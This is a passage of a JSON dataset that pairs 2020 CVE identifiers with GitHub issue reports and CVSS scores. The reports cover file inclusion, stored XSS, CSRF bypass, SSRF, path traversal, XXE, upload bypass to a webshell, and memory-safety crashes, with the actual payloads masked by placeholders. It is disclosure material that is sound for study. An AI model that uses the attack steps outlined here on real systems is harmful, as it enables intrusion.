        "description": "Monstra NUMBERTAG Local File Inclusion Vulnerability. Brief of this vulnerability There is a local File Inclusion Vulnerability in the CMS, which can be exploited by an attacker to execute PHP code Test Environment APITAG APITAG PHP NUMBERTAG mysql NUMBERTAG Affect version NUMBERTAG payload URLTAG We can create FILETAG In the web directory, the content is APITAG FILETAG FILETAG FILETAG Or we can use Apache logs NUMBERTAG use burpsuite FILETAG NUMBERTAG include log FILETAG FILETAG Reason of This Vulnerability Directly from the get parameter and include this parameter, resulting in a APITAG file\uff1a APITAG ERRORTAG As long as we assign a value to the sn variable and it is not empty, we can skip the first NUMBERTAG if APITAG variable CFG is directly assigned to APITAG and then the include method is executed, resulting in a vulnerability",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25422",
        "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/2",
        "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/2",
        "Repo_new": "r0ck3t1973/xss_payload",
        "Issue_Created_At": "2020-09-01T08:41:16Z",
        "description": "Cross Site Script Vulnerability on APITAG Menu\" in Mara NUMBERTAG Describe the bug / An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Menu\" feature. To Reproduce / Steps to reproduce the behavior NUMBERTAG Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Insert Payload: APITAG APITAG APITAG Hello world! APITAG APITAG NUMBERTAG Click Test: Alert XSS Message NUMBERTAG Save and go to Admin Panel NUMBERTAG Alert XSS Message / Expected behavior / The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page / Screenshots NUMBERTAG go to PATHTAG FILETAG NUMBERTAG Insert Payload FILETAG NUMBERTAG Click Test: Alert XSS Message FILETAG NUMBERTAG Save and go to Admin Panel NUMBERTAG Alert XSS Message FILETAG APITAG (please complete the following information):/ OS: Windows Browser: All I Hope you fix it ASAP",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-25427",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1406",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1406",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-02-08T13:37:09Z",
        "description": "Null pointer dereference in function APITAG Command : APITAG crypt FILETAG $POC out test.mp4 Version : APITAG GPAC version NUMBERTAG re NUMBERTAG g NUMBERTAG a8ef NUMBERTAG master Reproducer file : Reproducer URLTAG GDB : CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-25453",
        "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/389",
        "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/389",
        "Repo_new": "blackcatdevelopment/blackcatcms",
        "Issue_Created_At": "2020-05-30T21:28:59Z",
        "description": "CSRF Bypass. Hi ~ I find a CSRF Bypass Vulnerability ! Version NUMBERTAG Author : Noth(\u6c88\u5f67\u74bf) Step NUMBERTAG go to PATHTAG Step NUMBERTAG Use burpsuite to intercept packets Step NUMBERTAG Generate APITAG ( remove the csrf_token ==> \"\" ) Test Video : URLTAG Bypass the csrf_token to login",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-25461",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/441",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/441",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2020-09-04T08:08:38Z",
        "description": "SEGV at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version NUMBERTAG abb build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25462",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/432",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/432",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2020-08-31T06:06:23Z",
        "description": "Heap buffer overflow at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version: de NUMBERTAG c NUMBERTAG git hash) build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. Heap buffer overflow at PATHTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25463",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/440",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/440",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2020-09-04T08:06:34Z",
        "description": "SEGV at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version NUMBERTAG abb build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25464",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/431",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/431",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2020-08-31T05:55:02Z",
        "description": "Heap buffer overflow at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version: de NUMBERTAG c NUMBERTAG git hash) build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC function APITAG { var a = FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25465",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/442",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/442",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2020-09-04T08:10:54Z",
        "description": "SEGV at PATHTAG Build environment: Ubuntu NUMBERTAG gcc NUMBERTAG st version NUMBERTAG abb build command: cd PATHTAG make test command: ./xst poc Target device: Desktop Linux POC FILETAG Description Below is the ASAN outputs. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25466",
        "Issue_Url_old": "https://github.com/crmeb/CRMEB/issues/22",
        "Issue_Url_new": "https://github.com/crmeb/crmeb/issues/22",
        "Repo_new": "crmeb/crmeb",
        "Issue_Created_At": "2020-09-07T08:16:41Z",
        "description": "An SSRF vulnerability leads to system access. By looking at the source code, we found a SSRF vulnerability that could read arbitrary files on a remote or local server and save them to a web server. Therefore, malicious users can download the malicious Trojan files to the web server to obtain the permissions of the web server\u3002 analysis\uff1a ERRORTAG The above code is to get the name of the file to download ERRORTAG Since the default value of the $type parameter is NUMBERTAG it will skip the if judgment directly and jump to the else judgment. The readfile method reads the value of the $url parameter and writes it to the output buffer. $content gets the content of the output buffer through the APITAG method. ERRORTAG The rest of the code is to write the contents of the read file to the web server. Recurrence of loopholes NUMBERTAG URLTAG poc: CODETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25467",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/163",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/163",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2020-08-26T10:22:13Z",
        "description": "segmentation fault in lzo_decompress_buf, stream.c NUMBERTAG Hi, there. There is invalid memory access in lzo_decompress_buf, stream.c NUMBERTAG in the newest branch NUMBERTAG be1ffb. System: ~~~~ APITAG DISTRIB_RELEASE NUMBERTAG DISTRIB_CODENAME=xenial APITAG NUMBERTAG LTS\" ~~~~ To reproduce, run: ~~~~ lrzip t poc ~~~~ POC: FILETAG This is the output from the terminal: ~~~~ Decompressing... Segmentation fault ~~~~ This is the trace reported by ASAN NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG a NUMBERTAG bp NUMBERTAG cd NUMBERTAG sp NUMBERTAG f NUMBERTAG afed NUMBERTAG T NUMBERTAG f NUMBERTAG a NUMBERTAG in lzo1x_decompress ( PATHTAG NUMBERTAG faff in lzo_decompress_buf .. APITAG NUMBERTAG faff in ucompthread .. APITAG NUMBERTAG f NUMBERTAG d6b9 in start_thread ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG c in clone ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG lzo1x_decompress Thread T1 created by T0 here NUMBERTAG f NUMBERTAG e NUMBERTAG e3 in pthread_create ( PATHTAG NUMBERTAG in create_pthread .. APITAG NUMBERTAG in fill_buffer .. APITAG NUMBERTAG in read_stream .. APITAG NUMBERTAG unknown module NUMBERTAG ABORTING ~~~~",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-25470",
        "Issue_Url_old": "https://github.com/AntSwordProject/antSword/issues/256",
        "Issue_Url_new": "https://github.com/antswordproject/antsword/issues/256",
        "Repo_new": "antswordproject/antsword",
        "Issue_Created_At": "2020-08-27T01:59:46Z",
        "description": "RCE Vulnerability in View Site. APITAG Ver NUMBERTAG There is a view site function which will show cookies in UI. FILETAG FILETAG After few tests i got that it can parse html tags. FILETAG So it can also execute javascript/node codes like this. FILETAG (i used base NUMBERTAG encoded command which decodes as APITAG )",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-25540",
        "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/244",
        "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/244",
        "Repo_new": "zoujingli/thinkadmin",
        "Issue_Created_At": "2020-08-27T08:28:52Z",
        "description": "APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG CODETAG APITAG \u53ef\u4ee5\u83b7\u53d6\u5230\u5f53\u524d\u7248\u672c\uff1a APITAG \uff0c\u2264\u8fd9\u4e2a\u7248\u672c\u7684\u90fd\u6709\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e URL\uff1a URLTAG URLTAG \u5217\u76ee\u5f55 APITAG \uff1a ERRORTAG \u76f4\u63a5\u628aPOST\u7684 rules \u548c ignore \u53c2\u6570\u4f20\u7ed9 APITAG \uff0c\u6839\u636e\u4e0a\u9762\u7684use\u5f15\u7528\u53ef\u4ee5\u77e5\u9053\u6587\u4ef6\u8def\u5f84\u5728 APITAG \uff1a ERRORTAG APITAG \u53ef\u4ee5\u4e0d\u7528\u5173\u6ce8\uff0c\u4ed6\u4f1a\u900f\u8fc7 APITAG \u53bb\u904d\u5386 APITAG \u6570\u7ec4\uff0c\u8c03\u7528 APITAG \u53bb\u9012\u5f52\u904d\u5386\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\uff0c\u6700\u540e\u5728\u900f\u8fc7 APITAG APITAG ERRORTAG ERRORTAG ERRORTAG APITAG URLTAG URLTAG POST: APITAG \u4e5f\u53ef\u4ee5\u4f7f\u7528 APITAG \u6765\u8fdb\u884c\u76ee\u5f55\u7a7f\u8d8a APITAG \u6f14\u793a\u7ad9\uff1a FILETAG \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6 APITAG \uff1a ERRORTAG \u9996\u5148\u4eceGET\u8bfb\u53d6 encode \u53c2\u6570\u5e76\u4f7f\u7528 APITAG \u89e3\u7801\uff1a ERRORTAG \u89e3\u5bc6UTF8\u5b57\u7b26\u4e32\u7684\uff0c\u521a\u597d\u4e0a\u9762\u6709\u4e2a\u52a0\u5bc6UTF8\u5b57\u7b26\u4e32\u7684 APITAG \uff0c\u653b\u51fb\u65f6\u76f4\u63a5\u8c03\u7528\u90a3\u4e2a\u5c31\u53ef\u4ee5\u4e86\uff1a ERRORTAG \u8ddf\u8fdb APITAG \uff0c\u6587\u4ef6\u8def\u5f84 APITAG \uff1a ERRORTAG \u9996\u5148 APITAG \u4e0d\u80fd\u591f\u662f APITAG \uff0c\u63a5\u7740\u8ddf\u8fdb APITAG \uff1a ERRORTAG \u6709\u4e00\u4e2a\u5141\u8bb8\u7684\u5217\u8868\uff1a APITAG \u4e5f\u5c31\u662f\u8bf4 APITAG \u5fc5\u987b\u8981\u4e0d\u662f APITAG APITAG APITAG \u800c APITAG APITAG APITAG \u6765\u66ff\u6362 APITAG \uff0c\u4e5f\u5c31\u662f\u4f20\u5165\uff1a APITAG APITAG APITAG Windows\u8bfb\u53d6 APITAG \uff1a FILETAG \u6f14\u793a\u7ad9\u8bfb\u53d6 APITAG \uff1a FILETAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25574",
        "Issue_Url_old": "https://github.com/hyperium/http/issues/352",
        "Issue_Url_new": "https://github.com/hyperium/http/issues/352",
        "Repo_new": "hyperium/http",
        "Issue_Created_At": "2019-11-16T16:31:23Z",
        "description": "Size issue in APITAG . URLTAG APITAG URLTAG method silently overflows to NUMBERTAG in release mode. This makes it possible to shrink the size of the map to NUMBERTAG with APITAG . If the map doesn't contain any entry, it sets the mask value to APITAG which is inconsistent but doesn't create any immediate harm. If the map contains any entry, the code will call APITAG and start infinite probing in this line URLTAG . Another problem is that the assertion for APITAG doesn't exist here, so it is possible to grow the map larger than APITAG . Demonstration URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25614",
        "Issue_Url_old": "https://github.com/antchfx/xmlquery/issues/39",
        "Issue_Url_new": "https://github.com/antchfx/xmlquery/issues/39",
        "Repo_new": "antchfx/xmlquery",
        "Issue_Created_At": "2020-08-29T08:57:03Z",
        "description": "Denial of Service (SIGSEGV) at xmlquery.( APITAG Summary The APITAG function allows all response types/formats to be parsed _(other than XML)_, so that it can proceed to the next process (e.g. APITAG from APITAG ) without validation. Description This security issue affects all xmlquery version. Steps to Reproduce CODETAG The logs will look similar to the following: ERRORTAG Vulnerable code: URLTAG Recommended Mitigations Validates the response from URLs loaded in APITAG , if not XML format; then returns an error.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25636",
        "Issue_Url_old": "https://github.com/ansible-collections/community.aws/issues/221",
        "Issue_Url_new": "https://github.com/ansible-collections/community.aws/issues/221",
        "Repo_new": "ansible-collections/community.aws",
        "Issue_Created_At": "2020-09-04T15:15:07Z",
        "description": "aws_ssm connection plugin should namespace its file transfers. SUMMARY The aws_ssm connection plugin uses an s3 buckets to transfer files to instances. It writes these files directly to the root of the bucket. If multiple ansible processes are running and sharing the same bucket at the same time, collisions could happen. ISSUE TYPE Bug Report COMPONENT NAME aws_ssm connection plugin ANSIBLE VERSION ansible NUMBERTAG rc2 config file = PATHTAG configured module search path = PATHTAG PATHTAG ansible python module location = PATHTAG executable location = PATHTAG python version NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG CONFIGURATION n/a OS / ENVIRONMENT debian NUMBERTAG STEPS TO REPRODUCE NUMBERTAG use the aws_ssm plugin NUMBERTAG look at the s3 bucket it used NUMBERTAG observe that the files are not namespaced by instance id EXPECTED RESULTS The plugin should transfer files in namespaced keys (folders) to avoid collisions. The namespace key should be configurable so specific IAM policies can be granted. ACTUAL RESULTS Files are written to the root of the s3 bucket.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-25640",
        "Issue_Url_old": "https://github.com/amqphub/amqp-10-resource-adapter/issues/13",
        "Issue_Url_new": "https://github.com/amqphub/amqp-10-resource-adapter/issues/13",
        "Repo_new": "amqphub/amqp-10-resource-adapter",
        "Issue_Created_At": "2020-09-10T14:27:51Z",
        "description": "JMS Connection password logged in cleartext. In the following log message, I can see my password in clear. Twice. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2020-25649",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2589",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2589",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-01-09T09:23:57Z",
        "description": "NUMBERTAG APITAG is not enough to stop expansion. As per description: URLTAG and URLTAG is not enough to stop expansion of entities. Depending on provider(xerces) being used it might work with current APITAG or not. If JDK default is used, it wont allow to expand entities, however, if other provider from classpath is used it might, for instance, JDK8 does not allow( iirc) but xerces NUMBERTAG does. Reference: URLTAG I tinkered a bit with databind classes and I had something like: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25658",
        "Issue_Url_old": "https://github.com/sybrenstuvel/python-rsa/issues/165",
        "Issue_Url_new": "https://github.com/sybrenstuvel/python-rsa/issues/165",
        "Repo_new": "sybrenstuvel/python-rsa",
        "Issue_Created_At": "2020-10-26T18:16:44Z",
        "description": "CVETAG Bleichenbacher style timing oracle in PKCS NUMBERTAG decryption code. Current PKCS NUMBERTAG decryption code: URLTAG performs the checks on the decrypted value in turn, aborting as soon as first error is found, it also raises an exception in case of errors. This likely provides enough of a timing side channel to mount a Bleichenbacher style attack. While it's unlikely that a completely side channel free implementation is possible (see URLTAG ), it should be possible to minimise the side channel by making at least the execution path the same irrespective of previous checks and by providing an API that returns a randomly generated secret in case of error (instead of leaking the timing side channel by rising an exception) for uses that feed the decrypted value directly to a hash or use it as an symmetric key.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-25663",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1723",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1723",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-10-06T12:41:15Z",
        "description": "heap use after free at APITAG accessor.h in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap use after free at APITAG APITAG in APITAG Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fffc NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING ` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG CFLAGS=\" fsanitize=address,undefined g\" CXXFLAGS=\" fsanitize=address,undefined g\" ./configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-25706",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3723",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/3723",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2020-07-24T13:25:27Z",
        "description": "the XSS issue has been found on FILETAG APITAG NUMBERTAG The vulnerability could be exploited by an attacker by forcing a user to upload a file with a \"name\" or \"xml_path\" containing client side code. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-25750",
        "Issue_Url_old": "https://github.com/DevGroup-ru/dotplant2/issues/400",
        "Issue_Url_new": "https://github.com/devgroup-ru/dotplant2/issues/400",
        "Repo_new": "devgroup-ru/dotplant2",
        "Issue_Created_At": "2020-09-13T13:11:04Z",
        "description": "XXE Vulnerability. In class APITAG PATHTAG ), there is an XXE vulnerability in APITAG function. ERRORTAG The user input($_POST['xml']) has been put into simplexml_load_string without sanitation. Although this parser does not print anything, attackers could also use blind XXE to get sensitive information. You could use APITAG to avoid this vulnerability. Thx",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25756",
        "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1135",
        "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1135",
        "Repo_new": "cesanta/mongoose",
        "Issue_Created_At": "2020-08-12T22:11:29Z",
        "description": "A buffer overflow error in mg_get_http_header. A buffer overflow error in mg_get_http_header function in PATHTAG in Mongoose NUMBERTAG where header_names and header_values have a bound of (MG_MAX_HTTP_HEADERS); however, there is no check to ensure that the loop does not exceed the upper bound. A Maliciously crafted http header can trigger this bug. To fix it, modify the loop condition into: for (i NUMBERTAG i < MG_MAX_HTTP_HEADERS && hm >header_names[i].len NUMBERTAG i++)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25790",
        "Issue_Url_old": "https://github.com/Typesetter/Typesetter/issues/674",
        "Issue_Url_new": "https://github.com/typesetter/typesetter/issues/674",
        "Repo_new": "typesetter/typesetter",
        "Issue_Created_At": "2020-09-18T17:44:24Z",
        "description": "Bypass File upload leads to Command execution. Hello all, I was testing the upload mechanism, and I found that it is possible to bypass the protection for .php files by placing the .php inside a .zip file and extracting it. Once this is done, it is possible to execute commands on the machine using a malicious php file (webshell). Okay, that and the viability decreased a little because it is an admin functionality, however, if it is not allowed to upload a .php file, then placing the same file inside a .zip and extracting and executing it should also not be allowed . Steps to reproduce NUMBERTAG As admin go to Content menu and click on Uploaded files NUMBERTAG Inside the try to upload a .php file, and NUMBERTAG try to upload a .php file directly, check that it is not possible NUMBERTAG Take the same .php file and place it in a .zip and upload it NUMBERTAG Extract through functionality and open the .php file Obs : A strange behavior was that, after extracting the PHP file in functionality, it is seen as HTML. APITAG ==> Executing Commands FILETAG ==> Try to upload a .php direct FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-25791",
        "Issue_Url_old": "https://github.com/bodil/sized-chunks/issues/11",
        "Issue_Url_new": "https://github.com/bodil/sized-chunks/issues/11",
        "Repo_new": "bodil/sized-chunks",
        "Issue_Created_At": "2020-09-06T22:04:56Z",
        "description": "Multiple soundness issues in Chunk and APITAG Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io. Description Chunk: Array size is not checked when constructed with APITAG and APITAG . Array size is not checked when constructed with APITAG . Clone and APITAG are not panic safe; A panicking iterator causes memory safety issues with them. APITAG Generates unaligned references for types with a large alignment requirement. Demonstration Crate: sized chunks Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG Cargo flags: release ERRORTAG Output: ERRORTAG Return Code NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25821",
        "Issue_Url_old": "https://github.com/jgm/peg-markdown/issues/43",
        "Issue_Url_new": "https://github.com/jgm/peg-markdown/issues/43",
        "Repo_new": "jgm/peg-markdown",
        "Issue_Created_At": "2020-09-21T10:01:11Z",
        "description": "NULL pointer dereference in the APITAG function. Hi, While fuzzing peg markdown with Honggfuzz, I found a NULL pointer dereference in the APITAG function. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25825",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6605",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6605",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-10-05T22:30:33Z",
        "description": "Bash scripts can reveal sensitive variable values NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25825",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6606",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6606",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-10-05T22:32:55Z",
